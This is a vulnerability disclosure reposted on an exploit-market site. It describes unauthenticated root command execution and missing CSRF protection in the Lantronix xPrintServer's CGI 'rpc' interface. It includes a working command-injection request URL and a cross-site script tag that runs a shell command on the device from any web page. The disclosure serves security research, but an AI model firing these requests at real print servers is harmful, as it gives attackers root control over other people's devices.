[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Lantronix xPrintServer Remote Command Execution / CSRF Vulnerabilities

Author
Jim Bauwens
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-22869
Category
remote exploits
Date add
13-11-2014
Platform
multiple
Hi,

The Lantronix xPrintServer is a small Linux powered print server for iOS. Main configuration happens through a web interface.

The problem is that the configuration happens through some ‘RPC’ interface; the web interfaces uses AJAX requests to talk to a CGI script that simply executes shell commands given to it. Take a look at the following screenshot:

http://i.imgur.com/gjbZhXZ.png

So.. that’s not really so secure. Launching a request to http://myip/ips?OP=rpc&c=whoami&a=0 tells me that everything is running as root. 

To make matters worse:
- The CGI script is accessible without needing to use credentials 
- The devices uses bonjour that by defaults registers itself as xprintserver.local in the local network
- The device has no CSRF protection

Example code that allows any website to fetch the Linux version.
<script src="http://xprintserver.local/ips?OP=rpc&c=echo%20var%20version=%27%22%27%20$(uname%20-a)%27%22%27&a=0”></script> 

This vulnerability is not reported to the vendor yet (because I need to register talk to their support).

Greetings,
Jim

#  0day.today [2024-12-24]  #